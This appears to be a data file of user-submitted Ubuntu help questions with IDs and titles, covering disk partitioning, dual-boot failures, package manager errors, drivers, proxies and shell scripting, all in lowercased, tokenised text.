229333	how to increase size of disk partition in linux ?	i want to increase size of my disk partition in which my ubuntu os is installed . i have another free partition available but i do n't see any option to merge these two or increase size . i have heard about gparted but do n't know how exactly does it work ?
229336	run win7 guest ( raw disk ) in ubuntu ( which was installed as dual boot on existing win7 )	i installed ubuntu 12.10 on top of win 7 as a dual boot ( awesome ! ) . i 'm hoping to use virtualbox to run my original win7 instance as a guest os under ubuntu . i found this existing question and followed the directions to no avail . i can get the vmdk file created but when i run it i just get a blank black screen with no additional information and windows never loads . i see no hd activity or anything that would indicate it 's loading . i used this command to create the vmdk file : vboxmanager internalcommands createrawvmdk -filename ~/.virtualbox/win7native.vmdk -rawdisk /dev/sda3 it looks like everything was created correctly but i just get a blank screen when i run the vm . i do get this warning when i boot the vm : virtualbox - warning the virtual machine execution may run into and error condition as described below ... the medium '/home/xxx/.virtualbox/win7native.vmdk ' has a logical size of 583gb but the file system the medium is located on can only handle up to 16gb in theory . we strongly recommend to put all your virtual disk images and the snapshot folder on a proper file system ( e.g . etc3 ) with a sufficient size . errorid : fat partition detected severity : warning how can i get this working ?
229337	infrared usb adapter not hot pluggable ?	for transferring exercise files from my polar heart rate monitor i use the software protrainer 5 with an external infrared usb adapter . using wine to run protrainer 5 and some adjustments mentioned here ( using irda-utils ) i managed to make it work . well , sort of : every time i want to transfer exercise files and the adapter is not plugged in i have to reboot my laptop with the usb adapter plugged in to make it work . since i have a laptop it unfortunately is no option to just always leave the adapter in . it seems to me that the usb adapter is n't hot pluggable ( which seems odd for a usb device ) or there must be another problem . polar weblink ( other software to transfer exercise files ) experiences the same issue . can anyone help me to fix this problem ? infrared usb adapter : polar irda usb adapter os : ubuntu 12.10 ( 64-bit ) hardware : lenovo thinkpad t500
229338	why dpkg says 'illegal package name in specifier ' when i try to remove a package ?	whenever i type into the terminal the command : sudo dpkg -r '/home/brentonhorne/downloads/virtualbox.deb' i receive the error : dpkg : error : -- remove needs a valid package name but '/home/brentonhorne/downloads/virtualbox.deb ' is not : illegal package name in specifier '/home/brentonhorne/downloads/virtualbox.deb ' : must start with an alphanumeric character type dpkg -- help for help about installing and deinstalling packages [ * ] ; use `dselect ' or `aptitude ' for user-friendly package management ; type dpkg -dhelp for a list of dpkg debug flag values ; type dpkg -- force-help for a list of forcing options ; type dpkg-deb -- help for help about manipulating *.deb files ; options marked [ * ] produce a lot of output - pipe it through `less ' or `more ' ! how do i get around this problem ?
229339	can i create two recoll databases , each for different directories ?	i have run recoll which created a database for my data partition on my internal hard drive . the database is stored under my home partition in the same internal hard drive . i now want to run recoll to create a database for a dicrectory on my external hard drive , and store this new database on that external hard drive , because my internal hard drive does n't have enough space to hold the new database . i was wondering how to do that in recoll ? note : my current recoll was installed from software center of ubuntu 12.04 . thanks !
229340	unable to install ubuntu 12.10 on windows 8 machine/ error no5	installing crashes halfway through `` copying files , '' showing an i/o device error error number 5 . there was problem in beginning of installation too -- ubuntu was not detecting the installed windows 8 system . my system is a dell inspiron 5520 laptop , with a 1 tb wdc hard disk in gpt , with efi . my current partition layout is : 102 mb efi system partition 200 gb windows 8 ntfs 22 gb root ext4 8 gb swap 20 gb home ext4 680 gb ntfs drive for storing all my files i tried installing both from a dvd disc and a usb drive ; both resulted in the same error . the built-in dell hardware diagnosis utility showed both hard disk and dvd drive as healthy . what may be the reason and how can i install ubuntu along side my windows 8 system ?
229343	boot problem with ubuntu and windows 8	i have a hp dv6 system . on which i was having the windows 8 installed . as i was interested in downloading the ubuntu 12.10 along with windows 8 ( not inside ) .i have made separate partition in ubuntu 12.10 but some how it backfires and now i am not able to boot windows 8 and ubuntu . with windows 8 there is no drive to access the drive partition that has os . with ubuntu i am getting blank screen . i am thinking that i have problem in system partition but i am not able to solve it . plz help me . i am in a venerable condition ... i have tried booting the window with the help of installation cd but iam not succesful in any of the method - 1-reset pc 2-recovery 3- from command prompt i tried to check disks but it is not showing anything
229348	how do i fix ati driver issue	i have little knowledge about ubuntu , but i am learning . recently , my ubuntu 12.04 required that i update . i noticed that it was updating xorg and other things , after the update i was asked to reboot . i did . now when i start that computer up , it can not detect any display and refuses to boot from usb . i have no idea how to recover my computer . it simply starts in what is akin to the terminal program and ask for my username and password . after that , i can enter commands . the problem may be because i manually installed drivers by copy pasting from some instructional that i now have no idea where they are , but what it amounts to is that i `` built '' the drivers . they were working great until this update . i did this because otherwise i was unable to have sound through my hdmi . after i hand built the drivers , they worked great . after this update ka-blam ! nothing ... also , i had okay-ed lots of update sources ( though all of them [ xorg and such ] were the stable versions , not the unstable update sources ) please help and thank you in advance . ( if this is posted incorrectly or misplace , please let me know what to do )
229349	how do i move items in the applications ( or main ) menu around ?	i 'm running 12.10 and in 12.04 i was able to move the items ( into other categories than where they 're presently situated ) in the applications menu by means of moving them in the application , main menu .
229352	how to record output to speakers ?	is there a program for ubuntu 12.10 that can record sounds of only the output of the speaker and not any voices from outside the pc ?
229359	why do i get `` host not found '' when using a restricted squid proxy in elinks ?	i want to block in elinks the yahoo sites ( www.yahoo.com and all its subdomains fr.yahoo.com , etc ) . i tried with squid ( squid.conf ) : acl badsites dstdomain .yahoo.com http_acces deny badsites and in elinks.conf : set.protocol.http.proxy.host = `` proxy.host:3128 '' set.protocol.http.proxy.user = `` '' set.protocol.http.proxy.passwd = `` '' but it does n't work . it tells me host not found on every site i try to access . do you have any idea why it behaves that way and can you tell me a solution ?
229363	increase size of partition ( ext4 ) or automount it	i wish to increase size of my / partition ( current size 21 gb ) , is that possible somehow ? i have more free space available , but don’t know how to add it into the existing partition . i have created a new partition ( named extra , size 12 gb ) with that free space and would like to either merge it with / or if that’s not possible is there any way to change the mount point . because the new partition i have created with the free space currently get mounted at /media/extra and i have to mount it every time i start computer . here is the output of sudo fdisk -l disk /dev/sda : 320.1 gb , 320072933376 bytes 255 heads , 63 sectors/track , 38913 cylinders , total 625142448 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0xb8000000 device boot start end blocks id system /dev/sda1 63 401624 200781 83 linux /dev/sda2 403456 31860735 15728640 7 hpfs/ntfs/exfat /dev/sda3 * 31860736 414078967 191109116 7 hpfs/ntfs/exfat /dev/sda4 414081022 625141759 105530369 f w95 ext 'd ( lba ) /dev/sda5 414081024 558030847 71974912 7 hpfs/ntfs/exfat /dev/sda6 583198720 625141759 20971520 83 linux /dev/sda7 558033903 583191629 12578863+ 83 linux partition table entries are not in disk order please help me in resolving this issue . thanks ! !
229368	how to remove chromium browser without removing lubuntu desktop	i am trying to remove the chromium browser through synaptic , but it tries to remove lubuntu desktop . how can i remove it keeping lubuntu desktop ?
229369	problem prevents the update or installation of new software	it 's been a week now that whenever i run sudo apt-get update it shows me this : err http : //archive.ubuntu.com quantal inrelease err http : //archive.ubuntu.com quantal-updates inrelease err http : //archive.ubuntu.com quantal-backports inrelease err http : //archive.ubuntu.com quantal-security inrelease err http : //archive.ubuntu.com quantal-proposed inrelease err http : //archive.canonical.com quantal inrelease err http : //archive.canonical.com quantal inrelease err http : //extras.ubuntu.com quantal inrelease err http : //ppa.launchpad.net quantal inrelease err http : //ppa.launchpad.net quantal inrelease err http : //ppa.launchpad.net quantal inrelease err http : //dl.google.com stable inrelease err http : //archive.ubuntu.com quantal release.gpg unable to connect to 127.0.0.1:9666 : err http : //archive.ubuntu.com quantal-updates release.gpg unable to connect to 127.0.0.1:9666 : err http : //archive.ubuntu.com quantal-backports release.gpg unable to connect to 127.0.0.1:9666 : err http : //archive.ubuntu.com quantal-security release.gpg unable to connect to 127.0.0.1:9666 : err http : //archive.canonical.com quantal release.gpg unable to connect to 127.0.0.1:9666 : err http : //extras.ubuntu.com quantal release.gpg unable to connect to 127.0.0.1:9666 : err http : //ppa.launchpad.net quantal release.gpg unable to connect to 127.0.0.1:9666 : err http : //ppa.launchpad.net quantal release.gpg unable to connect to 127.0.0.1:9666 : err http : //dl.google.com stable release.gpg unable to connect to 127.0.0.1:9666 : err http : //archive.ubuntu.com quantal-proposed release.gpg unable to connect to 127.0.0.1:9666 : err http : //archive.canonical.com quantal release.gpg unable to connect to 127.0.0.1:9666 : err http : //ppa.launchpad.net quantal release.gpg unable to connect to 127.0.0.1:9666 : reading package lists ... done w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/quantal/inrelease w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/quantal-updates/inrelease w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/quantal-backports/inrelease w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/quantal-security/inrelease w : failed to fetch http : //archive.canonical.com/ubuntu/dists/quantal/inrelease w : failed to fetch http : //extras.ubuntu.com/ubuntu/dists/quantal/inrelease w : failed to fetch http : //archive.canonical.com/dists/quantal/inrelease w : failed to fetch http : //dl.google.com/linux/chrome/deb/dists/stable/inrelease w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/quantal-proposed/inrelease w : failed to fetch http : //ppa.launchpad.net/tualatrix/ppa/ubuntu/dists/quantal/inrelease w : failed to fetch http : //ppa.launchpad.net/ubuntu-x-swat/x-updates/ubuntu/dists/quantal/inrelease w : failed to fetch http : //ppa.launchpad.net/videolan/stable-daily/ubuntu/dists/quantal/inrelease w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/quantal/release.gpg unable to connect to 127.0.0.1:9666 : w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/quantal-updates/release.gpg unable to connect to 127.0.0.1:9666 : w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/quantal-backports/release.gpg unable to connect to 127.0.0.1:9666 : w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/quantal-security/release.gpg unable to connect to 127.0.0.1:9666 : w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/quantal-proposed/release.gpg unable to connect to 127.0.0.1:9666 : w : failed to fetch http : //archive.canonical.com/ubuntu/dists/quantal/release.gpg unable to connect to 127.0.0.1:9666 : w : failed to fetch http : //archive.canonical.com/dists/quantal/release.gpg unable to connect to 127.0.0.1:9666 : w : failed to fetch http : //extras.ubuntu.com/ubuntu/dists/quantal/release.gpg unable to connect to 127.0.0.1:9666 : w : failed to fetch http : //ppa.launchpad.net/tualatrix/ppa/ubuntu/dists/quantal/release.gpg unable to connect to 127.0.0.1:9666 : w : failed to fetch http : //ppa.launchpad.net/ubuntu-x-swat/x-updates/ubuntu/dists/quantal/release.gpg unable to connect to 127.0.0.1:9666 : w : failed to fetch http : //ppa.launchpad.net/videolan/stable-daily/ubuntu/dists/quantal/release.gpg unable to connect to 127.0.0.1:9666 : w : failed to fetch http : //dl.google.com/linux/chrome/deb/dists/stable/release.gpg unable to connect to 127.0.0.1:9666 : w : some index files failed to download . they have been ignored , or old ones used instead . and when i try to download and install a software from terminal it tells me : e : unable to fetch some archives , maybe run apt-get update or try with -- fix-missing ? i also tried installing softwares from synaptic it also gives me errors of same kinds.. also there is a red triangle on the top right of my screen telling me : the update information is outdated . this may be caused by network problems or a repository that no longer exists , now i searched a lot on web on trying to solve this problem so i ran plenty of repositories to see if they work.. but non of them worked.. i checked also my software sources , i ticked or unticked everything on `` other software '' tab , but still nothing changed . this is how my software sources is now : also this is the body of my etc/apt/source.list : # deb cdrom : [ ubuntu 12.10 _quantal quetzal_ - release i386 ( 20121017.2 ) ] / quantal main restricted # see http : //help.ubuntu.com/community/upgradenotes for how to upgrade to # newer versions of the distribution . deb http : //archive.ubuntu.com/ubuntu quantal main restricted deb-src http : //archive.ubuntu.com/ubuntu quantal main restricted # # major bug fix updates produced after the final release of the # # distribution . deb http : //archive.ubuntu.com/ubuntu quantal-updates main restricted deb-src http : //archive.ubuntu.com/ubuntu quantal-updates main restricted # # n.b . software from this repository is entirely unsupported by the ubuntu # # team . also , please note that software in universe will not receive any # # review or updates from the ubuntu security team . deb http : //archive.ubuntu.com/ubuntu quantal universe deb-src http : //archive.ubuntu.com/ubuntu quantal universe deb http : //archive.ubuntu.com/ubuntu quantal-updates universe deb-src http : //archive.ubuntu.com/ubuntu quantal-updates universe # # n.b . software from this repository is entirely unsupported by the ubuntu # # team , and may not be under a free licence . please satisfy yourself as to # # your rights to use the software . also , please note that software in # # multiverse will not receive any review or updates from the ubuntu # # security team . deb http : //archive.ubuntu.com/ubuntu quantal multiverse deb-src http : //archive.ubuntu.com/ubuntu quantal multiverse deb http : //archive.ubuntu.com/ubuntu quantal-updates multiverse deb-src http : //archive.ubuntu.com/ubuntu quantal-updates multiverse # # n.b . software from this repository may not have been tested as # # extensively as that contained in the main release , although it includes # # newer versions of some applications which may provide useful features . # # also , please note that software in backports will not receive any review # # or updates from the ubuntu security team . deb http : //archive.ubuntu.com/ubuntu quantal-backports main restricted universe multiverse deb-src http : //archive.ubuntu.com/ubuntu quantal-backports main restricted universe multiverse deb http : //archive.ubuntu.com/ubuntu quantal-security main restricted deb-src http : //archive.ubuntu.com/ubuntu quantal-security main restricted deb http : //archive.ubuntu.com/ubuntu quantal-security universe deb-src http : //archive.ubuntu.com/ubuntu quantal-security universe deb http : //archive.ubuntu.com/ubuntu quantal-security multiverse deb-src http : //archive.ubuntu.com/ubuntu quantal-security multiverse # # uncomment the following two lines to add software from canonical's # # 'partner ' repository . # # this software is not part of ubuntu , but is offered by canonical and the # # respective vendors as a service to ubuntu users . deb http : //archive.canonical.com/ubuntu quantal partner deb-src http : //archive.canonical.com/ubuntu quantal partner # # uncomment the following two lines to add software from ubuntu's # # 'extras ' repository . # # this software is not part of ubuntu , but is offered by third-party # # developers who want to ship their latest software . deb http : //extras.ubuntu.com/ubuntu quantal main deb http : //archive.canonical.com/ quantal partner deb-src http : //archive.canonical.com/ quantal partner deb-src http : //extras.ubuntu.com/ubuntu quantal main deb http : //dl.google.com/linux/chrome/deb/ stable main deb-src http : //dl.google.com/linux/chrome/deb/ stable main deb http : //archive.ubuntu.com/ubuntu quantal-proposed restricted main multiverse universe any idea how i can fix this ?
229371	way to set a file as a nautilus bookmark ?	nautilus allows user to set a folder as a bookmark . i want to set a text file ( that opens in gedit ) as a bookmark that will appear in the sidepane . is this possible ?
229372	m3u2u1ms playlists	does m3u2u1ms work only on music purchased though ubuntu one ? when i run the following : m3u2u1ms tangos_orig.m3u scanning songs finding ubuntu one identifiers for songs 83 songs correctly identified from playlist looking for an existing playlist 'tangos_orig ' ... [ { 'id ' : u'd-3cf4977ef29a4ead95c1e404f2e2ca63 ' , 'name ' : u'tangos ' } ] no existing playlist found : creating a new one it creates a playlist on ubuntu one , but it only contains 11 songs i purchased from the ubuntu music store and does n't include the other songs i purchased elsewhere but uploaded to u1 . thanks .
229375	installed ubuntu on seperate partition using wubi , can i delete my windows partition entirely ?	i installed ubuntu 12.04 ( updated to 12.10 ) on a separate partition from inside windows 8 using wubi . i would like to use only ubuntu . can i simply delete the partition where windows is located ? btw i 'm using the windows boot loader .
229376	xorg : no mouse clicks ( radeon hd 3200 )	my computer has integrated graphics radeon hd3200 , that brougt me several problems with different versions of ubuntu . the only one that i could n't manage is that every time i restart the pc i have to login into gnome or openbox twice , cause the first time xorg does n't get my mouse clicks . it handles mouse movements and all keyboard orders . when i logout and come back login in , problems are gone . this problem happens also with and without fglrx . same with or without compiz . and either if i use gnome or openbox . no errors ( ee ) in xorg.log . any ideas ?
229378	how to change `` file type '' on upload to ubuntu one cloud storage	how do i change `` file type '' on upload to ubuntu one cloud storage . one avi file comes up as `` video/x-msvideo '' and the other comes up as `` video/avi '' i would like them to both be the same .
229383	edubuntu 12.04 lts : restricting users to just a few programs	edubuntu 12.04 lts : restricting users to just a few programs been using ubuntu myself for several years and want to try edubuntu at a school where a pc would be loosely supervised . i can create a non-admin user with that user as auto logon but are there installed tools to restrict what that user can do on that machine ? there is lovely documentation on installing these products but i do n't see good how-tos or quickstarts for edubuntu . is there innate support for this task in edubuntu ? thanks for any help .
229384	make online link for application in softvare center	is it possible to make online link for an application which is located in ubuntu software center . i need to advertise my app and i do n't know how to make link for my app ( i do n't have website ) .
229388	whats a shadow password ?	i liked the ubuntu 12.10 , so i downloaded it and and installed via wubi , then it told me to restart my pc to complete the installation . after i restarted and selected ubuntu in the os selection ; for a few seconds a blank screen came and then it showed shadow password is on ; then a blank screen for a few more seconds ; then a whole lot of code-like characters came and it just wo n't boot up . i just wan na use 12.10 nothing else , i have vista business installed on the c : / drive , and ubuntu is installed on the f : / drive ( f : /ubuntu ) .
229389	how to find out where $ manpath is set ?	how can i find out in which configuration file the environment variable $ manpath is set ? is there a way to backtrace the values ? i am aware of that i can grep through the whole file system using find or grep . i am using zsh most of the time instead of bash . i run ubuntu precise .
229391	line of pixels 12.10	i there was a question asked a while ago , but still with no answer . when i change the volume in ubuntu 12.10 it has an orange line of pixels that appear for a second above the volume indicator ( ? ) that appears at the top right of the screen . this is a clean install , on compatible hardware . so it should n't be just me with this problem . original line of pixels when changing volume 12.10
229393	how do i fix broken libreoffice packages	i have `` broken packages '' but when i attempt to fix them in synaptic package manager , i get this error message : dpkg : unrecoverable fatal error , aborting : files list file for package `libreoffice-calc ' contains empty filename e : sub-process /usr/bin/dpkg returned an error code ( 2 ) a package failed to install . trying to recover : dpkg : dependency problems prevent configuration of libreoffice-writer : libreoffice-writer depends on libreoffice-core ( = 1:3.6.2~rc2-0ubuntu4 ) ; however : version of libreoffice-core on system is 1:3.6.2~rc2-0ubuntu3 . libreoffice-writer depends on libreoffice-base-core ( = 1:3.6.2~rc2-0ubuntu4 ) ; however : version of libreoffice-base-core on system is 1:3.6.2~rc2-0ubuntu3 . dpkg : error processing libreoffice-writer ( -- configure ) : dependency problems - leaving unconfigured dpkg : error processing libreoffice-base-core ( -- configure ) : package is in a very bad inconsistent state - you should reinstall it before attempting configuration . dpkg : dependency problems prevent configuration of libreoffice-calc : libreoffice-calc depends on libreoffice-core ( = 1:3.6.2~rc2-0ubuntu4 ) ; however : version of libreoffice-core on system is 1:3.6.2~rc2-0ubuntu3 . libreoffice-calc depends on libreoffice-base-core ( = 1:3.6.2~rc2-0ubuntu4 ) ; however : version of libreoffice-base-core on system is 1:3.6.2~rc2-0ubuntu3 . dpkg : error processing libreoffice-calc ( -- configure ) : dependency problems - leaving unconfigured errors were encountered while processing : libreoffice-writer libreoffice-base-core libreoffice-calc the sudo apt-get install -f command gives me this : reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following extra packages will be installed : libreoffice-base-core libreoffice-core libreoffice-draw libreoffice-gnome libreoffice-gtk libreoffice-impress libreoffice-math python-uno suggested packages : libreoffice-base libreoffice-evolution the following packages will be upgraded : libreoffice-base-core libreoffice-core libreoffice-draw libreoffice-gnome libreoffice-gtk libreoffice-impress libreoffice-math python-uno 8 upgraded , 0 newly installed , 0 to remove and 196 not upgraded . 3 not fully installed or removed . need to get 0 b/36.8 mb of archives . after this operation , 0 b of additional disk space will be used . do you want to continue [ y/n ] ? y dpkg : unrecoverable fatal error , aborting : files list file for package `libreoffice-calc ' contains empty filename e : sub-process /usr/bin/dpkg returned an error code ( 2 ) using sudo apt-get purge libreoffice* followed by sudo apt-get install libreoffice give me : reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : libreoffice : depends : libreoffice-core ( = 1:3.6.2~rc2-0ubuntu4 ) but 1:3.6.2~rc2-0ubuntu3 is to be installed depends : libreoffice-base but it is not going to be installed depends : ttf-dejavu but it is not going to be installed depends : libreoffice-java-common ( > = 1:3.6.2~rc2~ ) but it is not going to be installed libreoffice-calc : depends : libreoffice-core ( = 1:3.6.2~rc2-0ubuntu4 ) but 1:3.6.2~rc2-0ubuntu3 is to be installed depends : libreoffice-base-core ( = 1:3.6.2~rc2-0ubuntu4 ) but 1:3.6.2~rc2-0ubuntu3 is to be installed libreoffice-writer : depends : libreoffice-core ( = 1:3.6.2~rc2-0ubuntu4 ) but 1:3.6.2~rc2-0ubuntu3 is to be installed depends : libreoffice-base-core ( = 1:3.6.2~rc2-0ubuntu4 ) but 1:3.6.2~rc2-0ubuntu3 is to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . i have no idea what to do .
229401	why am i getting such slow file transfer performance ?	copying 4gb from a usb flash drive to my linux partition . the flash drive is ntfs formatted ( i believe , it 's windows formatted ) . the transfer is incredibly slow and blocks the computer frequently causing lag and hanging applications . my transfer rate is 1.2 mb/sec and that is the max it has hit when i let the file operations window have focus . i can do the equivalent operation on my windows machine at 100mb . why is this so slow under ubuntu and significantly faster in win 7 ? note : i installed ubuntu from windows using the windows installs as a dual boot option . does this process use `` ramdisk '' or some weird thing that might be causing this ?
229406	xrandr ignores setting dpi ( zenbook running 12.10 )	i recently got a zenbook prime and installed ubuntu . following the tips at https : //help.ubuntu.com/community/asuszenbook worked out pretty well . only one problem remains : i can not set the dpi . i tried to do xrandr -- dpi 138/edp1 but that does n't seem to have the desired effect . it changes the output of xdpyinfo |grep resolution but no change is visible . also , xrandr still reports the same screen size . i tried adding xft.dpi : 138 to .xresources , which did n't change anything . i also tried to generate a xorg.conf , where i set option `` dpi '' `` 138 x 138 '' in the monitor section . the xorg.0.log then tells me ( == ) intel ( 0 ) : dpi set to ( 96 , 96 ) ... ( ww ) intel ( 0 ) : option `` dpi '' is not used i have no idea what else to try and it does n't seem any one else has the same problem : ( any help would be much appreciated . ps : i know that it is possible to zoom fonts , but i 'd rather actually set the dpi of the screen .
229408	ubuntu 12.10 freezes after boot	i 'm trying to install ubuntu 12.10 but i am having a hard time . first , tried from wubi ( windows installer ) , all went fine , dual-boot worked , but as soon as ubuntu boots , it freezes - even before the login screen is fully loaded . i have tried installing via usb with linuxlive usb creator , but had the same exact issue . i use an intel core 2 duo 2 , 8 ghz , 4 gb ram , nvidia geforce 9400gt 512 mb .
229410	advanced login screen editing	i 've been trying to find out how i can further customize the login screen on ubuntu 10.04 lts . is this something that can be done in terms of moving the actual window for the username and password more upwards and to the left ? if i can resize it and also change the color and transparency to it or is this something i can only accomplish by downloading the source code and finding a way within there ?
229411	20 gb space offer	there is an offer which says buy any track from the new ubuntu one music store and get 6 months music streaming + 20gb storage free ! is the 20gb space time limited ?
229413	can not dual boot ubuntu 12.10 with windows 8 .	i have tried automatic partition , i have did the partition myself but ubuntu installs alright . but when i restart the computer it goes back to windows 8 and i have tried easybcd boot manager but it did n't work either . i displays ubuntu on the dual boot screen but after a while the screen shutdowns and say it did n't find the boot file or the boot file was missing ? do you guys know how to solve this problem ? any suggestions ?
229416	making python 3.3 default python 3 interpreter instead of 3.2	so , to keep it simple . ubuntu 12.10 has python 3.2 pre installed and it is linked to `` python3 '' . i downloaded python 3.3 and it 's command is `` python3.3 '' . however , i downloaded pyside for python3 from synaptic . using `` from pyside.qtcore import * '' fails on python3.3 . but , when i ran just `` python3 '' ( aka 3.2 ) everything works fine . synaptic just installed lib for python3.2 which is default for python3 in ubuntu . how can i force synaptic to install modules for python3.3 ? thanks
229417	how to get permissions for all users for new drive added to the system - 12.10	i 've added a new disk with a single ext4 partition and i want to use this as a shared multimedia drive /dev/sdd1 for all users and occasional samba users . it seems to work ok while i am logged in as root , but i ca n't seem to add rwx permissions for others . i 've used nautilus under gksu to change the properties ( permissions tab ) for the media store folder in media/nick but it seems to make no difference on permissions for other users . do i have to log into each of those other users , mount the drive with the super user permissions , then change the mount permissions for each users mount point folder ? that seems a lot of work to do for each user , especially if it is not permanent . i guess there are lines i should be adding to fstab ... . ..but to be honest , as a newbie , i 've got lost and would appreciate your pointers on a simple how-to guide . my mount output is below ... probably in a mess ... /dev/sdc1 on / type ext4 ( rw , errors=remount-ro ) proc on /proc type proc ( rw , noexec , nosuid , nodev ) sysfs on /sys type sysfs ( rw , noexec , nosuid , nodev ) none on /sys/fs/fuse/connections type fusectl ( rw ) none on /sys/kernel/debug type debugfs ( rw ) none on /sys/kernel/security type securityfs ( rw ) udev on /dev type devtmpfs ( rw , mode=0755 ) devpts on /dev/pts type devpts ( rw , noexec , nosuid , gid=5 , mode=0620 ) tmpfs on /run type tmpfs ( rw , noexec , nosuid , size=10 % , mode=0755 ) none on /run/lock type tmpfs ( rw , noexec , nosuid , nodev , size=5242880 ) none on /run/shm type tmpfs ( rw , nosuid , nodev ) none on /run/user type tmpfs ( rw , noexec , nosuid , nodev , size=104857600 , mode=0755 ) gvfsd-fuse on /run/user/nick/gvfs type fuse.gvfsd-fuse ( rw , nosuid , nodev , user=nick ) /dev/sde1 on /media/nick/elements type fuseblk ( rw , nosuid , nodev , allow_other , default_permissions , blksize=4096 ) /dev/sdc2 on /media/gill/xpmedia type fuseblk ( rw , nosuid , nodev , allow_other , default_permissions , blksize=4096 ) /dev/sdb1 on /media/nick/multimedia type fuseblk ( rw , nosuid , nodev , allow_other , default_permissions , blksize=4096 ) /dev/sda1 on /media/nick/system type fuseblk ( rw , nosuid , nodev , allow_other , default_permissions , blksize=4096 ) gvfsd-fuse on /run/user/gill/gvfs type fuse.gvfsd-fuse ( rw , nosuid , nodev , user=gill ) /dev/sdd1 on /media/nick/media store type ext4 ( rw , nosuid , nodev , uhelper=udisks2 ) and here is my fstab : # /etc/fstab : static file system information . # # use 'blkid ' to print the universally unique identifier for a # device ; this may be used with uuid= as a more robust way to name devices # that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > # / was on /dev/sdd1 during installation uuid=bafb49a7-48da-4ec0-9ce2-639d831591d9 / ext4 errors=remount-ro 0 1 # swap was on /dev/sdd5 during installation uuid=58d2c95e-afaf-4adb-9c46-ae0f05af056c none swap sw 0 0 /dev/fd0 /media/floppy0 auto rw , user , noauto , exec , utf8 0 0 there is no floppy in the system anymore , so i guess i could delete that without problems . thanks , nick
229420	is rhythmbox able to queue tracks played while it is offline , to scrobble them later ?	i 'm wondering if rhythmbox is able to queue tracks played while it is offline , to submit them to last.fm later when an internet connection becomes available . i think banshee supports that .
229431	failed to upgrade to ubuntu 11.10	this error prevents the system from upgrading to a newer version of ubuntu , what is causing it ? w : failed to fetch http : //extras.ubuntu.com/ubuntu/dists/natty/main/source/sources 404 not found w : failed to fetch http : //extras.ubuntu.com/ubuntu/dists/natty/main/binary-amd64/packages 404 not found e : some index files failed to download . they have been ignored , or old ones used instead . since i got the warning message that this release is not supported anymore , should i download and install ubuntu 12.10 directly from ubuntu 's site instead ?
229433	looking for compatabile external usb video adapter for ubuntu 12.04	i have a gateway sx that has two video output ports 1 dvi and one vga . the dvi port went bad and i want to add an external usb vga video card that will work with ubuntu 12.04 64 bit so i can use 2 monitors again . does anyone have any recommendations or know of a product that will work with ubuntu 12.04 64bit thanks
229434	will all device driver software work with linux ?	for example , i write my own device driver for a specific device , any kind really , such as maybe a wireless usb mouse or the like ... how do i add it to the linux kernel ? will the kernel support drivers ? how would this process go about ? not too familiar with linux 's kernel system ...
229436	are windows partitions gone ?	i had windows 7 on my laptop ( factory setting ) , because of some performance issues , i decided to use recovery options to restore it to its factory condition but i do n't know what has happened or what i have done that the whole operating system was gone after playing around with recovery options from the boot menu . i could n't find windows , so i installed ubuntu 11.04 on my laptop . last time i had ubuntu on it , it was not really compatible with laptop 's configuration and i had a bit of problems trying to do normal tasks i used to do on windows . now i want to make sure that windows and its drivers are gone so that i can try to install a newer version of ubuntu or windows . i tried the command sudo fdisk -l and the result shown was : myaccount @ myaccount-vpcs116fg : ~ $ sudo fdisk -l [ sudo ] password for myaccount : disk /dev/sda : 320.1 gb , 320072933376 bytes 255 heads , 63 sectors/track , 38913 cylinders units = cylinders of 16065 * 512 = 8225280 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00025b5f device boot start end blocks id system /dev/sda1 * 1 38409 308515840 83 linux /dev/sda2 38409 38914 4052993 5 extended /dev/sda5 38409 38914 4052992 82 linux swap / solaris disk /dev/dm-0 : 4150 mb , 4150263808 bytes 255 heads , 63 sectors/track , 504 cylinders units = cylinders of 16065 * 512 = 8225280 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0xa668cfe8 disk /dev/dm-0 does n't contain a valid partition table is it gone ? if not , what command should i try to have access to windows partitions ? thank you .
229437	firefox/thunderbird `` personas '' do not cover window decorations	is there anyway to make firefox personas cover window decorations ? chrome seems to be able to do this if you disable the gtk theme .
229443	lightdm . run commands before xmonad is started	i have xmonad installed from package manager and ubuntu 12.10 with lightdm . how can i interpose the loading process to run my own script before xmonad is started ? for example , i would like to setup wallpaper using feh . in all the manuals i have found so far , .xinitrc is being used for this purpose , but it does n't work for lightdm .
229446	how to pass results of bc to a variable	i 'm writing a script and i would like to pass the results from bc into a variable . i 've declared 2 variables ( var1 and var2 ) and have given them values . in my script i want to pass the results from bc into another variable say var3 so that i can work with var3 for other calculations . so far i have been able write the result to a file which is not what i 'm looking for and also i 've been able to echo the result in the terminal but i just want to pass the result to a variable at moment so that i can work with that variable . echo `` scale=2 ; $ var1/var2 '' | bc
229447	how do i diff the output of two commands ?	i had imagined the simplest way to compare the contents of two similar directories would be something like diff `ls old` `ls new` but i see why this does n't work ; diff is being handed a big long list of files on the command line , rather than two streams like i had hoped . how do i pass the two outputs to diff directly ?
229452	function keys on an external keyboard	so i bought a keyboard for my laptop . unfortunately , it does n't have the function key ( though i know many people say it 's useless ) . on my laptop , i control volume with the function key and f9-11 . how can i get the same functionality on my external keyboard ? the advanced keyboard settings do n't have an option related to the function key . more specifically , it would be great if i could map it to my 'menu ' key which i 'm never going to use . or is there a way to get full functionality without it ?
